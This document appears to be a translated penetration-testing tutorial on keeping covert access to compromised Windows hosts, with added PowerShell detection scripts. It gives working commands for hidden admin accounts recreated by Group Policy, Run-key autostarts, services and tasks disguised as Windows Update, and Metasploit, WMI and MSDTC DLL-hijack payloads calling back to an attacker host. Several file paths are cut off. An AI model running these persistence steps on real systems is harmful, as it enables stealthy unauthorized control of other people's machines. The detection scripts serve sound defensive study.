Windows privilege maintenance
I. File level
1) attrib
Use the command attrib +s +a +h +r:
- s: sets the System attribute
- a: sets the Archive attribute
- h: sets the Hidden attribute
- r: sets the Read-only attribute
attrib +s +a +h +r c:\test
After the command runs, the test directory is no longer shown, but it still exists and can be accessed by its path.
To make it visible again, clear the corresponding attributes with the matching minus flags; the test folder then shows up again.
2) System icon hiding
A folder can be renamed to "My computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" (a name followed by a dot and a shell CLSID).
Its icon becomes the My Computer icon, and double-clicking it opens My Computer rather than the folder's own contents.
From the command line, however, the folder is still visible, and its contents can still be accessed and viewed.
Common folder names:
My computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Recycle Bin.{645ff040-5081-101b-9f08-00aa002f954e}
Dial-Up Networking.{992CFFA0-F557-101A-88EC-00DD010CCC48}
Printers.{2227a280-3aea-1069-a2de-08002b30309d}
Control Panel.{21ec2020-3aea-1069-a2dd-08002b30309d}
Network Neighborhood.{208d2c60-3aea-1069-a2d7-08002b30309d}
3) Malformed names
Create a folder with the name test...\ ; the displayed name is test...
The folder itself can be seen, but the files inside it cannot be accessed or deleted.
md test...\
copy test...\
Deleting it from the graphical interface reports that the item cannot be found.
Opening a file inside it gives an error and the contents cannot be viewed.
The only way to remove it is to run rd with the following switches:
- /s: deletes the files in the specified directory and all subdirectories recursively.
- /q: quiet mode, i.e. deletes directly without prompting for confirmation.
rd /s /q c:\test...\
4) Driver-level file hiding
The most typical sign of driver-level hiding is the presence of the following files on the system drive:
c:\WINDOWS\
c:\WINDOWS\
c:\WINDOWS\
c:\WINDOWS\system32\drivers\
Driver-level hiding can be done with EasyFileLocker.
Download link./s/1h2_k1picYeinpz3XtI8ypA?pwd = 141d
Extract code: 141d
Select the attributes to enable hiding of files.
To remove it:
1. Query the service status: sc qc xlkfs
2. Stop the service: net stop xlkfs (once the service stops, the files hidden at driver level are revealed)
3. Delete the service: sc delete xlkfs
4. Delete the files under the system directory and restart the system to make sure the service has been cleaned up.
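The four tricks above each leave an artifact that can be enumerated from an administrative PowerShell prompt. The following script is an added example, not code from the original article: it reports System+Hidden directories outside the ones Windows creates itself, folders with a CLSID suffix, names ending in a dot or space, and running drivers that are not Microsoft-signed. It assumes PowerShell 5.1 or later (for -Depth); $Root, $Depth and the $knownSysHidden list are constructed values to adjust.

```powershell
# Added audit script, not code from the original article.
$Root  = 'C:\'   # constructed: drive to audit
$Depth = 2       # constructed: how deep to recurse (deeper is slower)
$clsid = '\.\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$'
# System+Hidden directories that Windows itself creates and that should not be reported
$knownSysHidden = 'System Volume Information', '$Recycle.Bin', 'Recovery', 'Config.Msi',
                  'ProgramData', 'Documents and Settings', 'WindowsApps', 'Boot'

Get-ChildItem -LiteralPath $Root -Directory -Force -Recurse -Depth $Depth -ErrorAction SilentlyContinue |
  ForEach-Object {
    $reasons = @()
    # 1) attrib +s +h: Explorer hides System+Hidden directories even with "show hidden files" on
    if ($_.Attributes.HasFlag([IO.FileAttributes]::System) -and
        $_.Attributes.HasFlag([IO.FileAttributes]::Hidden) -and
        $_.Name -notin $knownSysHidden) { $reasons += 'system+hidden' }
    # 2) "name.{CLSID}": Explorer shows the shell object (My Computer, Recycle Bin, ...) instead
    if ($_.Name -match $clsid) { $reasons += 'clsid-suffix' }
    # 3) names ending in dots or spaces, which ordinary Win32 paths cannot open or delete
    if ($_.Name -match '[. ]$') { $reasons += 'trailing-dot-or-space' }
    if ($reasons) { [pscustomobject]@{ Path = $_.FullName; Reasons = ($reasons -join ',') } }
  }

# 4) running kernel drivers; PathName may be written as \SystemRoot\..., \??\C:\... or System32\...
Get-CimInstance Win32_SystemDriver -Filter "State='Running'" | ForEach-Object {
    $img = $_.PathName -replace '^\\\?\?\\', '' -replace '^\\SystemRoot\\', "$env:windir\" -replace '^System32\\', "$env:windir\System32\"
    $sig = if (Test-Path -LiteralPath $img) { Get-AuthenticodeSignature -LiteralPath $img } else { $null }
    $status = if ($sig) { $sig.Status } else { 'image-not-found' }
    # Microsoft also countersigns WHQL third-party drivers, so this is a coarse first filter
    if (-not $sig -or $sig.SignerCertificate.Subject -notmatch 'Microsoft') {
        [pscustomobject]@{ Driver = $_.Name; Image = $img; Signature = $status }
    }
}
```

A directory reported as trailing-dot-or-space can be removed with the rd /s /q command shown above; a driver entry whose service name matches nothing you installed is the one to look at first.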
II. Group Policy
The Group Policy backdoor is more insidious still: it runs automatically whenever the computer performs the corresponding operation, for example shutdown:
@echo off
net user lingx5$ 1234 /add
net localgroup administrators lingx5$ /add
exit
Save this as a batch script.
The script adds a user lingx5$ with password 1234 and puts lingx5$ into the administrators group.
A user whose name ends in $ is what is commonly called a shadow user (hidden user). It is very difficult for an ordinary user to discover this account, and even if it is found and deleted, the group policy script runs again at the next shutdown and recreates it.
Press Win+R, open the Local Group Policy Editor, and navigate to "Computer Configuration > Windows Settings > Scripts (Startup/Shutdown)".
Add the script in the Shutdown properties.
Restart the computer.
The user is added successfully and is not shown by the net user command.
Group Policy is not limited to adding users for persistence: attackers can also use it to run malicious scripts or programs, sniff the administrator's password, and so on.
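To find a shadow account and the shutdown script that recreates it, the following PowerShell snippet is an added example, not from the original article: it lists local accounts whose names end in $, whether they are in Administrators, and the local Group Policy script entries. It assumes Windows 10/Server 2016 or later for Get-LocalUser and the English "Administrators" group name.

```powershell
# Added check, not code from the original article.
# net user hides accounts whose names end in $, but Get-LocalUser does not.
$admins = @(Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
            ForEach-Object { $_.Name })               # entries look like HOST\lingx5$
foreach ($u in Get-LocalUser | Where-Object { $_.Name.EndsWith('$') }) {
    $isAdmin = [bool]($admins | Where-Object { $_ -like "*\$($u.Name)" })
    "{0,-20} enabled={1} admin={2} passwordSet={3}" -f $u.Name, $u.Enabled, $isAdmin, $u.PasswordLastSet
}

# The local GPO's startup/shutdown scripts live in a hidden directory. scripts.ini (batch/exe)
# and psscripts.ini (PowerShell) hold [Startup] / [Shutdown] sections with NCmdLine= and
# NParameters= lines; a shutdown script that re-adds an account shows up here.
$scriptRoot = Join-Path $env:windir 'System32\GroupPolicy\Machine\Scripts'
foreach ($ini in 'scripts.ini', 'psscripts.ini') {
    $path = Join-Path $scriptRoot $ini
    if (-not [IO.File]::Exists($path)) { continue }
    "--- $path ---"
    [IO.File]::ReadAllLines($path) | Where-Object { $_ -match '^\s*(\[|\d+(CmdLine|Parameters)=)' }
}
# The script files themselves, so each one can be opened and read
Get-ChildItem -LiteralPath $scriptRoot -Recurse -Force -File -ErrorAction SilentlyContinue |
    Select-Object FullName, Length, LastWriteTime
```

Deleting the account alone does not help, as the text above explains; the script entry and file have to go as well.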
III. Registry
1) Adding entries manually
The registry is also commonly used by attackers for persistence: it holds a huge amount of information, so an entry hidden in it is much harder to notice and troubleshoot.
- reg add: the command used to add or modify registry entries.
- "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run": the registry key to operate on; this key stores the current user's auto-start programs.
- /v Pentestlab: the name of the value to add (the commands below use "loaclUser"; any name can be used).
- /t REG_SZ: the data type of the value, a string (REG_SZ).
- /d "C:\Users\tmp\": the data of the value, i.e. the path of the program to auto-start (here the trojan or backdoor program).
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v loaclUser /t REG_SZ /d "C:\Users\tmp\"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v loaclUser /t REG_SZ /d "C:\Users\tmp\"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v loaclUser /t REG_SZ /d "C:\Users\tmp\"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v loaclUser /t REG_SZ /d "C:\Users\tmp\"
Note that RunServices and RunServicesOnce are Windows 9x/ME-era keys; current Windows versions do not process them, so on a modern system only the Run and RunOnce entries actually start anything. The values are still written, so they remain worth checking during an investigation.
Two further registry locations allow an attacker to achieve persistence by executing arbitrary payloads or DLLs. These run at logon and require administrator-level privileges.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v loaclUser /t REG_SZ /d "C:\tmp\"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v loaclUser /t REG_SZ /d "C:\tmp\"
2) meterpreter persistence
a) persistence module
Meterpreter also has modules that automate this. Once the machine has a session in msf, the persistence module can be used:
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) > set session 1
session => 1
msf6 exploit(windows/local/persistence) > set lhost 192.168.84.128
lhost => 192.168.84.128
msf6 exploit(windows/local/persistence) > set lport 4444
lport => 4444
msf6 exploit(windows/local/persistence) > set startup USER
startup => USER
msf6 exploit(windows/local/persistence) > run
[*] Running persistent module against DESKTOP-906JKQ3 via session ID: 1
[+] Persistent VBS script written on DESKTOP-906JKQ3 to C:\Users\lingx5\AppData\Local\Temp\
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svwTznRkXi
[+] Installed autorun on DESKTOP-906JKQ3 as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svwTznRkXi
[*] Clean up Meterpreter RC file: /home/kali/.msf4/logs/persistence/DESKTOP-906JKQ3_20240827.3418/DESKTOP-906JKQ3_20240827.
msf6 exploit(windows/local/persistence) >
After backgrounding the session in meterpreter, use the windows/local/persistence module, specify the session id, set the parameters and run it: it generates a VBS script in the Temp directory and automatically adds a Run registry entry.
Then just listen on Kali and wait for the target to log in and connect back.
The disadvantage of this approach is that the generated program has not been through our own AV evasion, so it is easily killed by antivirus software and the trojan never comes online.
b) persistence_exe module
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/manage/persistence_exe
msf6 post(windows/manage/persistence_exe) > set session 1
session => 1
msf6 post(windows/manage/persistence_exe) > set rexepath /opt/win_exp/win_exp.exe
rexepath => /opt/win_exp/win_exp.exe
msf6 post(windows/manage/persistence_exe) > set rexename
rexename =>
msf6 post(windows/manage/persistence_exe) > run
[*] Running module against DESKTOP-906JKQ3
[*] Reading Payload from file /opt/win_exp/win_exp.exe
[+] Persistent Script written to C:\Users\lingx5\AppData\Local\Temp\
[*] Executing script C:\Users\lingx5\AppData\Local\Temp\
[+] Agent executed with PID 2076
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dJggfAUjDAS
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dJggfAUjDAS
[*] Cleanup Meterpreter RC File: /home/kali/.msf4/logs/persistence/DESKTOP-906JKQ3_20240827.0058/DESKTOP-906JKQ3_20240827.
[*] Post module execution completed
msf6 post(windows/manage/persistence_exe) >
rexepath specifies the locally prepared AV-evading executable, /opt/win_exp/win_exp.exe.
rexename specifies the name of the uploaded file (usually a system service name, which is harder to spot). The default upload directory is %TEMP%.
The downside is that the path of the uploaded file cannot be chosen, so it is not well hidden.
It is still recommended to upload the file with upload and add the registry entries manually, etc., to maintain access.
c) WMI Persistence
msf6 exploit(windows/local/wmi_persistence) > show options
Module options (exploit/windows/local/wmi_persistence):
Name Current Setting Required Description
---- --------------- -------- -----------
CALLBACK_INTERVAL 1800000 yes Time between callbacks (In milliseconds). (Default: 1800000).
CLASSNAME UPDATER yes WMI event class name. (Default: UPDATER)
EVENT_ID_TRIGGER 4624 yes Event ID to trigger the payload. (Default: 4625)
PERSISTENCE_METHOD EVENT yes Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAITFOR)
PROCESS_TRIGGER yes The process name to trigger the payload. (Default: )
SESSION 1 yes The session to run this module on
USERNAME_TRIGGER BOB yes The username to trigger the payload. (Default: BOB)
WAITFOR_TRIGGER CALL yes The word to trigger the payload. (Default: CALL)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '',seh,thread,process, none)
LHOST 192.168.84.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
DisablePayloadHandler: True (no handler will be created!)
Parameter description:
- CALLBACK_INTERVAL: the interval between callbacks in milliseconds. The default is 1800000 ms (30 minutes), so the persistent payload is triggered every 30 minutes.
- CLASSNAME: the name of the WMI event class, which identifies this persistence task on the target system. The default is UPDATER; it can be changed to some other unobtrusive name.
- EVENT_ID_TRIGGER: which event ID triggers the payload. The default is 4625, the common logon-failure event in the Windows logs. It can be changed to another event ID (e.g. 4624, successful logon) to trigger the payload more flexibly.
- PERSISTENCE_METHOD: the trigger method for persistence. The available methods are:
  - EVENT: triggered by an event ID (e.g. a logon-failure event).
  - INTERVAL: triggered periodically (based on CALLBACK_INTERVAL).
  - LOGON: triggered when the user logs on.
  - PROCESS: triggered when the specified process starts.
  - WAITFOR: triggered when the system waits for a specific keyword.
- PROCESS_TRIGGER: only valid when PERSISTENCE_METHOD is set to PROCESS; the name of the process to monitor. The payload is triggered when that process starts. The default is empty; change it to any legitimate process you wish to monitor.
- SESSION: the target session (session ID) on which to run the module. This parameter must be set.
- USERNAME_TRIGGER: only valid when PERSISTENCE_METHOD is set to LOGON; the payload is triggered when this username logs on. The default is BOB; change it to an actual username on the target system.
- WAITFOR_TRIGGER: only valid when PERSISTENCE_METHOD is set to WAITFOR; the keyword that triggers the payload. The default is CALL.
Payload options (windows/x64/meterpreter/reverse_tcp):
- EXITFUNC: the exit method:
  - process: the default; ends the current process on exit.
  - seh: exits via the Structured Exception Handling (SEH) mechanism.
  - thread: only the current thread is terminated on exit.
  - none: no exit action is taken.
- LHOST: the listening address (IP) of your attacking machine, i.e. the address the target system connects back to, usually your local IP or VPS IP.
- LPORT: the listening port on your attacking machine; the target system connects to this port when it calls back.
- DisablePayloadHandler: if set to True, Metasploit does not automatically start a handler for the payload. This is often used to avoid conflicts when other listeners are already running.
Typical example:
use windows/local/wmi_persistence
set session 1
set persistence_method EVENT
set event_id_trigger 4624
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.84.128
set lport 4444
run
One thing to keep in mind: this module requires administrator access on the target system.
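The persistence this module installs lives in the root/subscription WMI namespace as an __EventFilter, an event consumer and a __FilterToConsumerBinding, so that is where a defender looks. The following PowerShell snippet is an added example, not code from the original article or the module: it lists every binding with its filter query and consumer payload and marks the consumer types that execute something; the Get-RefName helper is constructed.

```powershell
# Added check, not code from the original article.
$ns = 'root/subscription'
$filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter)
$consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer)
$bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding)

function Get-RefName {
    # A binding's Filter/Consumer is a CIM reference: an object with the CIM cmdlets, or a
    # string such as __EventFilter.Name="UPDATER" with the older WMI cmdlets. Return the Name.
    param($Ref)
    if ($Ref -is [string]) { return ($Ref -replace '^.*Name="([^"]*)".*$', '$1') }
    return $Ref.Name
}

foreach ($b in $bindings) {
    $f = $filters   | Where-Object { $_.Name -eq (Get-RefName $b.Filter) }
    $c = $consumers | Where-Object { $_.Name -eq (Get-RefName $b.Consumer) }
    $cClass = if ($c) { $c.CimClass.CimClassName } else { 'missing' }
    # The module installs a CommandLineEventConsumer (CommandLineTemplate) or an
    # ActiveScriptEventConsumer (ScriptText). The built-in "SCM Event Log Consumer" is an
    # NTEventLogEventConsumer and is expected on every Windows host.
    $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } elseif ($c.ScriptText) { $c.ScriptText } else { '' }
    [pscustomobject]@{
        Filter   = $f.Name
        Query    = $f.Query   # what the filter listens for: an event-log query (EVENT), a timer (INTERVAL), ...
        Consumer = $cClass
        Payload  = $payload
        Suspect  = ($cClass -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer')
    }
}
# Removal once confirmed: delete the binding first, then its filter and consumer, e.g.
#   $b | Remove-CimInstance; $f | Remove-CimInstance; $c | Remove-CimInstance
```

Run it elevated; an unelevated shell can read the namespace but not always every consumer's payload.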
d) Adding users
post/windows/manage/add_user
Create a hidden user with administrator rights to revisit later.
use post/windows/manage/add_user
set session 1
set USER test
set PASS 1234
run
I only have normal user permissions here, so it was not added successfully.
You also need the permission to add users before this succeeds.
e) Creation of services
persistence_service
This module creates a new service for persistence.
use exploit/windows/local/persistence_service
set SESSION 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.84.128
set LPORT 4444
set REMOTE_EXE_NAME
set SERVICE_NAME WindowsUpdateService
set SERVICE_DISPLAY_NAME "Windows Update Service"
set SERVICE_DESCRIPTION "Provides updates for the Windows operating system."
set STARTUP auto
run
Requires administrator privileges
IV. Planned tasks
Windows provides a utility that lets system administrators run programs or scripts at specific dates and times.
Attackers can abuse this behaviour as a persistence mechanism. Creating a scheduled task does not require administrator privileges, so an attacker who can already run a program on the host can use a scheduled task for persistence.
Elevated privileges allow further options, such as running the task at user logon or when the system is idle.
SCHTASKS is a built-in Windows command-line tool for creating, deleting and managing scheduled tasks.
schtasks /create /tn "Windows Update Service" /tr "C:\Windows\System32\" /sc onlogon /ru "SYSTEM"
Parameter explanation:
- /create: creates a new task.
- /tn "Windows Update Service": the task name (here disguised as "Windows Update Service").
- /tr "C:\Windows\System32\": the path of the program the task runs.
- /sc onlogon: the task trigger, here user logon (other triggers can be set too, such as /sc onstart for system startup).
- /ru "SYSTEM": runs the task with SYSTEM privileges (often used to ensure execution with elevated privileges).
Common trigger conditions:
- /sc minute: runs every N minutes.
- /sc daily: runs once a day.
- /sc onstart: runs at system startup.
- /sc onlogon: runs when the user logs in.
Validation:
schtasks /query /tn "Windows Update Service"
V. Creating services
Services in a Windows environment can lead to privilege escalation if they are misconfigured, and they can also be used as a persistence method. Creating a new service requires administrator-level privileges, and it is no longer a covert persistence technique. In a red team operation against a company whose threat detection is immature it can still be used to cause further disruption, and organizations should build SOC capabilities to identify threats that use such basic techniques in their malware.
sc create ServiceName binPath= "C:\Path\To\Your\" start= auto
- ServiceName: choose your own inconspicuous service name.
- binPath: the path where the backdoor program lives.
- start: the startup mode.
Creating a new service with PowerShell:
New-Service -Name "SystemUpdate" -BinaryPathName "C:\temp\" -Description "systemupdate" -StartupType Automatic
sc start pentestlab
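Sections III.1 (Run keys), IV (scheduled tasks) and V (services) all boil down to a command line stored in a known location, so they can be audited together. The following PowerShell script is an added example, not code from the original article: it gathers the three kinds of entries and flags any whose executable is missing, unsigned, or outside the Windows and Program Files trees. It assumes Windows 8/PowerShell 4 or later (Get-ScheduledTask, catalog-aware Get-AuthenticodeSignature); the Get-ExePath and Get-Flags helpers and the $Trusted list are constructed.

```powershell
# Added audit script, not code from the original article.
$Trusted = @("$env:windir\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\") |
           Where-Object { $_.Length -gt 1 }

function Get-ExePath {
    # Pull the executable out of a command line such as  "C:\a b\x.exe" /k  or  C:\x.exe /k
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cl = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cl.StartsWith('"')) {
        $end = $cl.IndexOf('"', 1)
        if ($end -lt 1) { return $null }
        $exe = $cl.Substring(1, $end - 1)
    } else {
        $exe = ($cl -split '\s+')[0]
    }
    if (-not [IO.Path]::IsPathRooted($exe)) {                  # bare names resolve via PATH
        $cmd = Get-Command $exe -ErrorAction SilentlyContinue
        if ($cmd) { $exe = $cmd.Path }
    }
    return $exe
}

function Get-Flags {
    # Reasons an entry deserves a look; nothing returned means it looks benign
    param([string]$Exe)
    if (-not $Exe) { return 'empty-command' }
    if (-not (Test-Path -LiteralPath $Exe -PathType Leaf)) { return 'missing-file' }
    $flags = @()
    $trusted = $Trusted | Where-Object { $Exe.StartsWith($_, 'OrdinalIgnoreCase') }
    if (-not $trusted) { $flags += 'outside-trusted-dir' }
    if ((Get-AuthenticodeSignature -LiteralPath $Exe).Status -ne 'Valid') { $flags += 'unsigned' }
    return $flags
}

$entries = @()
# 1) Run keys for the current user and the machine, including the numbered RunOnceEx subkeys
$runKeys = foreach ($k in 'Run', 'RunOnce', 'RunOnceEx') {
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\$k"
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\$k"
}
$runKeys = @($runKeys | Where-Object { Test-Path $_ })
$runKeys += @(Get-ChildItem -Path $runKeys -Recurse -ErrorAction SilentlyContinue | ForEach-Object PSPath)
foreach ($key in $runKeys) {
    foreach ($v in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($v.Name -like 'PS*') { continue }                 # PSPath, PSParentPath, ... are metadata
        $entries += [pscustomobject]@{ Source = "$key\$($v.Name)"; Command = "$($v.Value)" }
    }
}
# 2) Scheduled tasks with a logon or boot trigger (the /sc onlogon and /sc onstart cases)
foreach ($t in Get-ScheduledTask) {
    $startup = $t.Triggers | Where-Object {
        $_.CimClass.CimClassName -in 'MSFT_TaskLogonTrigger', 'MSFT_TaskBootTrigger' }
    if (-not $startup) { continue }
    foreach ($a in ($t.Actions | Where-Object { $_.Execute })) {
        $entries += [pscustomobject]@{
            Source  = "Task $($t.TaskPath)$($t.TaskName) (runs as $($t.Principal.UserId))"
            Command = "$($a.Execute) $($a.Arguments)" }
    }
}
# 3) Services that start automatically
foreach ($s in Get-CimInstance Win32_Service -Filter "StartMode='Auto'") {
    $entries += [pscustomobject]@{ Source = "Service $($s.Name)"; Command = $s.PathName }
}
foreach ($e in $entries) {
    $flags = Get-Flags (Get-ExePath $e.Command)
    if ($flags) { "{0}`n    {1}  [{2}]" -f $e.Source, $e.Command, ($flags -join ', ') }
}
```

Run it elevated so that HKLM and every task are visible; expect a few legitimate hits (third-party agents under their own install paths), which is why each line carries the reason it was flagged.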
VI. Memory horses
Memory horses are a form of fileless attack. Fileless attacks effectively evade traditional security software by executing remotely loaded code in the system's memory, residing in the registry, or abusing commonly whitelisted tools such as PowerShell, WMI and PsExec. Fileless techniques give attackers access to a system for subsequent malicious activity: by combining exploits, legitimate tools, macros and scripts, an attacker can compromise a system, elevate privileges or spread malicious code laterally across a network. Moreover, fileless threats leave no trace after execution, which makes them difficult to detect and remove.
Memory horses never land on disk and are hard to detect with traffic monitoring, so they are hard to find and troubleshoot.
Principle
Memory injection:
- A memory horse resides in memory without touching the disk, by injecting malicious code directly into the memory of the target process or by loading malicious classes and functions. This avoids traditional disk-based detection such as antivirus software or file integrity monitoring.
Hooking key components:
- A memory horse typically gets its code to intercept, modify or execute specific requests by hooking system APIs, a web server's request-handling functions, or the core logic of an application framework. For example:
  - In web containers (e.g. Tomcat, JBoss, WebLogic), the memory horse can hook a Servlet or Filter component that listens for HTTP requests and executes malicious logic when a specific request arrives.
  - In .NET environments, the memory horse may hook into the HTTP request processing pipeline.
Categorization
1. servlet-api type: dynamically registers a new listener, filter or servlet through command execution to gain command execution and other functions. Framework- or container-specific memory horses work on the same principle, such as Spring controller memory horses and Tomcat valve memory horses.
2. Bytecode-enhanced type: dynamically modifies existing code through Java instrumentation to gain command execution and other functions.
The most common is the Java memory horse, which relates to how Java processes a request:
1. The client sends an HTTP request, say a GET.
2. The Servlet container receives the request and wraps the request information into HttpServletRequest and HttpServletResponse objects.
3. The Servlet container calls the HttpServlet's init() method. init() is called only on the first request.
4. The Servlet container calls the service() method.
5. service() calls doGet or doPost according to the request type; here the request is a GET, so doGet is called.
6. In the doGet method we write our own business logic.
7. After the business logic runs, control returns to the Servlet container, which returns the result to the client.
8. When the container shuts down, the destroy() method is called.
If malicious code is written in the doGet method, the servlet container loads it into system memory, which is how a memory horse is injected.
Implementation
Taking Tomcat's servlet-API-type memory horse as an example, the implementation is as follows:
Create a malicious servlet, obtain the current StandardContext, wrap the malicious servlet in a Wrapper and add it to the children of the StandardContext, and finally add a ServletMapping to bind the access URL to the Wrapper.
The memory horse still has a drawback: as soon as the container or service is shut down and restarted, destroy() is called, the memory horse is killed and its objects are reclaimed by the JVM's garbage collector.
VII. Hijacking the back door
Introduction to MSDTC
MSDTC is the Microsoft Distributed Transaction Coordinator program. The process calls the system's Microsoft Personal Web Server and Microsoft SQL Server, and is used to manage multiple servers.
A distributed transaction is a concurrent transaction spread across two or more databases, message queues, file systems, or other transaction-protected resource managers, so be careful when deleting it.
The corresponding service is MSDTC, full name Distributed Transaction Coordinator, which Windows starts by default.
The corresponding process is located in %windir%\system32.
Principle
The attack begins when Windows starts the Microsoft Distributed Transaction Coordinator (MSDTC) service, which coordinates transactions across multiple resource managers such as databases, message queues and file systems. Once the computer has joined a domain, the MSDTC service searches the registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI
as soon as it starts. The MTxOCI component of the MSDTC service looks for three DLLs named there, one of which Windows does not ship by default. Since the system does not contain that DLL, we write our own malicious DLL under that name and place it in %SystemRoot%\system32\. Once it is in place, kill the MSDTC process with taskkill /im /f, which makes MSDTC reload itself; this time it looks for the DLL, finds it, and the service pulls up our backdoor DLL.
Implementation
Create a DLL file:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.84.128 LPORT=4444 -f dll >
Upload the generated file to the C:\Windows\System32 directory of the target machine:
upload C:\Windows
shell
C:\Windows>move c:\Windows\System32
With the DLL in system32, restart the msdtc service:
taskkill /f /im
Start msdtc again:
net start msdtc
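Because the hijack relies on the DLL names stored under the MTxOCI key, a defender can read those names back and check what actually sits in System32 and what the msdtc process has loaded. The following PowerShell snippet is an added example, not code from the original article; it assumes the process name msdtc and an elevated shell for the module listing.

```powershell
# Added check, not code from the original article.
$key = 'HKLM:\SOFTWARE\Microsoft\MSDTC\MTxOCI'
if (-not (Test-Path $key)) { 'MTxOCI key not present'; return }
$sys32 = Join-Path $env:windir 'System32'
foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
    # keep only the string values that name a DLL; PS* properties are PowerShell metadata
    if ($p.Name -like 'PS*' -or $p.Value -isnot [string] -or $p.Value -notmatch '\.dll$') { continue }
    # A bare file name is resolved through the normal DLL search order, so a copy dropped
    # into System32 is what MSDTC picks up; a full path is checked where it points.
    $candidate = if ([IO.Path]::IsPathRooted($p.Value)) { $p.Value } else { Join-Path $sys32 $p.Value }
    $present   = Test-Path -LiteralPath $candidate
    $signature = if ($present) { (Get-AuthenticodeSignature -LiteralPath $candidate).Status } else { 'absent' }
    [pscustomobject]@{ Value = $p.Name; Dll = $p.Value; Present = $present; Signature = $signature }
}

# Second view: modules the running msdtc process has actually loaded that are not
# Microsoft-signed (reading a service process's module list needs an elevated shell)
foreach ($proc in Get-Process -Name msdtc -ErrorAction SilentlyContinue) {
    foreach ($m in $proc.Modules) {
        $s = Get-AuthenticodeSignature -LiteralPath $m.FileName
        if ($s.SignerCertificate.Subject -notmatch 'Microsoft') {
            [pscustomobject]@{ Module = $m.ModuleName; Path = $m.FileName; Signature = $s.Status }
        }
    }
}
```

A DLL that is Present with Signature NotSigned, or a loaded module outside the Windows tree, is the artifact this technique leaves behind.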
All of my articles are for technical sharing, they are used for documentation for defense purposes, and all operations are carried out in an experimental environment, so please do not use them for any other purpose, or suffer the consequences.